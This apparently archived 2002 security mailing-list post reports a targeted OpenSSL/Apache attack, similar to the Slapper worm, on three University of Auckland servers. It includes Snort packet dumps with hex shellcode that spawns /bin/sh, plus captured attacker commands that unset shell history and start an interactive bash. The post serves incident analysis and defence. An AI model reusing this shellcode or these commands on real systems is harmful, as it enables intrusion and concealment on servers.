HI, we have just had 3 servers attacked via OpenSSL using very similar exploits to the slapper worm. There are however differences: 1/ there was no port 80 scan or probes (targets had clearly been selected before hand) 2/ there were many more iterations of the basic attack (around 30) None of the systems were compromised. Here are the snortsnarf summary of the attack on one system: Earliest: 17:37:20.489882 on 09/17/2002 (times are UTC +1200) Latest: 17:39:13.367289 on 09/17/2002 3 different signatures are present for 211.224.129.96 as a source * 28 instances of OpenSSL worm attack * 28 instances of Apache chunked encoding exploit, uname -a * 31 instances of Apache chunked encoding exploit, AAAAA padding snort packet dumps from one iteration: [**] Apache chunked encoding exploit, AAAAA padding [**] 09/17-05:37:33.740719 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x21C 211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12337 IpLen:20 DgmLen:526 DF ***AP*** Seq: 0xB9A41B14 Ack: 0xFC880B34 Win: 0x1DCE TcpLen: 32 TCP Options (3) => NOP NOP TS: 163261451 45779712 81 D8 02 01 00 80 00 00 00 80 01 4E C4 44 22 F0 ...........N.D". A2 3B 7B 70 A8 24 1D D2 62 DA 15 96 7A 16 55 33 .;{p.$..b...z.U3 D1 84 55 86 AA 1B 53 B0 E8 25 4B 4F 4A 01 D2 17 ..U...S..%KOJ... E6 43 31 09 EC 04 74 80 04 14 22 D6 BD E9 BD 8D .C1...t..."..... 2D 91 AC 39 C6 15 32 38 25 BC 15 8A ED CE C1 A9 -..9..28%....... D7 6B 92 02 E0 6A 28 69 E4 41 1F AB DD 46 46 CB .k...j(i.A...FF. A0 74 E8 5B C4 59 DC 9F B6 52 69 C6 A4 16 94 CC .t.[.Y...Ri..... 13 FF C6 76 4F 3E A0 88 72 1A CE 11 AF 34 4D 45 ...vO>..r....4ME 8D 7E 2E F4 BC 00 EF C6 FB 63 44 5D 0E 0C 2F 34 .~.......cD]../4 2F 0B 48 2C 41 41 41 41 41 41 41 41 41 41 41 41 /.H,AAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 00 00 00 00 00 00 00 00 41 41 41 41 AAAA........AAAA 01 00 00 00 41 41 41 41 41 41 41 41 41 41 41 41 ....AAAAAAAAAAAA 8C D0 69 40 41 41 41 41 00 00 00 00 00 00 00 00 ..i@AAAA........ 00 00 00 00 41 41 41 41 41 41 41 41 00 00 00 00 ....AAAAAAAA.... 11 00 00 00 F0 37 3D 08 A0 11 1D 08 10 00 00 00 .....7=......... 10 00 00 00 EB 0A 90 90 90 90 90 90 90 90 90 90 ................ 31 DB 89 E7 8D 77 10 89 77 04 8D 4F 20 89 4F 08 1....w..w..O .O. B3 10 89 19 31 C9 B1 FF 89 0F 51 31 C0 B0 66 B3 ....1.....Q1..f. 07 89 F9 CD 80 59 31 DB 39 D8 75 0A 66 B8 CA A6 .....Y1.9.u.f... 66 39 46 02 74 02 E2 E0 89 CB 31 C9 B1 03 31 C0 f9F.t.....1...1. B0 3F 49 CD 80 41 E2 F6 31 C9 F7 E1 51 5B B0 A4 .?I..A..1...Q[.. CD 80 31 C0 50 68 2F 2F 73 68 68 2F 62 69 6E 89 ..1.Ph//shh/bin. E3 50 53 89 E1 99 B0 0B CD 80 .PS....... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [**] OpenSSL worm attack [**] 09/17-05:37:35.403562 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x6F 211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12340 IpLen:20 DgmLen:97 DF ***AP*** Seq: 0xB9A41D11 Ack: 0xFC880B6D Win: 0x1DCE TcpLen: 32 TCP Options (3) => NOP NOP TS: 163261618 45779777 54 45 52 4D 3D 78 74 65 72 6D 3B 20 65 78 70 6F TERM=xterm; expo 72 74 20 54 45 52 4D 3D 78 74 65 72 6D 3B 20 65 rt TERM=xterm; e 78 65 63 20 62 61 73 68 20 2D 69 0A 0A xec bash -i.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [**] Apache chunked encoding exploit, uname -a [**] 09/17-05:37:35.403639 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x64 211.224.129.96:51878 -> 130.216.50.18:443 TCP TTL:49 TOS:0x20 ID:12341 IpLen:20 DgmLen:86 DF ***AP**F Seq: 0xB9A41D3E Ack: 0xFC880B6D Win: 0x1DCE TcpLen: 32 TCP Options (3) => NOP NOP TS: 163261618 45779777 75 6E 73 65 74 20 48 49 53 54 46 49 4C 45 3B 20 unset HISTFILE; 75 6E 61 6D 65 20 2D 61 3B 20 69 64 3B 20 77 3B uname -a; id; w; 0A 0A .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Looks to me as if someone has repackaged the exploits to use in a more directed fashion. -- Russell Fulton, Computer and Network Security Officer The University of Auckland, New Zealand "It aint necessarily so" - Gershwin ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 17 2002 - 17:14:40 PDT